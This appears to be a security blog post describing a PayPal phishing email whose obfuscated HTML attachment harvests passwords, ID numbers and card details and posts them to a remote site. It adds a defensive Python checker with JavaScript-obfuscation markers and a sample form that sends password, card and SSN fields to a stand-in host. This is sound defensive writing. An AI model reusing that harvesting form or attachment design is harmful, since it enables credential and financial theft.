Phishing email targeting PayPal customers to steal user account information.
Below is the mail I received today, which claims to be from PayPal. It says my PayPal account has been limited, and to restore my account access it asks me to fill in the attached form.
The attached form “PP-658-119-347.htm” is an HTML file containing obfuscated JavaScript. Deobfuscation shows the original script, which is used to collect the user's personal information.
On opening, the mail attachment displays a page similar to the PayPal profile update page. It is an HTML file designed to look like PayPal. How do we know it is fake? You haven’t logged into any account using your credentials, but you can still see the logout button as if you had logged in. Also, remember that you have opened an HTML file, not the original website: check your address bar.
It collects basic profile information along with your PayPal password. On the next page it checks which country you belong to. If you’re from the US, you will be prompted with an additional box asking for “Social Security Number.” If you’re from Sweden, it prompts for “Personal identity number.” Likewise, the prompt displayed depends on the country.
Finally, it asks you to enter credit/debit card information. It even validates the input fields: if you try to skip a field or enter invalid data, it pops up an alert message.
So, where does it send this information? The answer can be found below. It will POST the collected information to a remote site. The remote site may be a compromised site. Once the account information is collected, the hacker will use it.
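
A defender-side check for attachments like this one, added here as an example (it is not code from the original post or from the attachment): it parses an HTML file and reports forms that POST to hosts outside the brand's own domain, sensitive input fields, and inline script calls typical of decode-and-write obfuscation. The trusted-domain list, the field-name hints, the marker list and the sample HTML with its `collector.example` host are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

TRUSTED = ("paypal.com",)                    # assumption: the brand's real domain
SENSITIVE = ("pass", "ssn", "card", "cvv")   # assumption: field-name hints
JS_MARKERS = ("unescape(", "eval(", "fromCharCode", "document.write(")

class FormAudit(HTMLParser):
    def __init__(self):
        super().__init__()
        self.actions, self.fields, self.js = [], set(), []
        self._in_script = False
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "").lower() for k, v in attrs}
        if tag == "form":
            self.actions.append(a.get("action", ""))
        elif tag == "input":
            label = a.get("type", "") + " " + a.get("name", "")
            self.fields.update(h for h in SENSITIVE if h in label)
        self._in_script = tag == "script"    # script body arrives via handle_data
    def handle_endtag(self, tag):
        self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.js.append(data)

def is_trusted(host):
    host = (host or "").lower()              # exact domain or a true subdomain only
    return any(host == d or host.endswith("." + d) for d in TRUSTED)

def triage(html):
    p = FormAudit()
    p.feed(html)
    out = []
    for action in p.actions:
        host = urlparse(action).hostname     # None for relative or empty actions
        if host and not is_trusted(host):
            out.append(f"form posts to untrusted host {host}")
    if p.fields:
        out.append("sensitive field hints: " + ", ".join(sorted(p.fields)))
    if any(m in "".join(p.js) for m in JS_MARKERS):
        out.append("inline script uses decode-and-write calls")
    return out

# Constructed sample, not the real attachment.
SAMPLE = """<script>document.write(unescape('%3Cp%3E'))</script>
<form method="post" action="http://collector.example/save.php">
<input name="password" type="password"><input name="card_number"><input name="ssn">
</form>"""
```

Because the attachment described here builds its page from obfuscated script, run the check on the deobfuscated HTML as well as on the raw file; the raw file may only trigger the script-marker finding.
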
Beware of these phishing email scams and avoid entering your personal information when prompted through email. Always go to the trusted secure site to update your personal and financial information.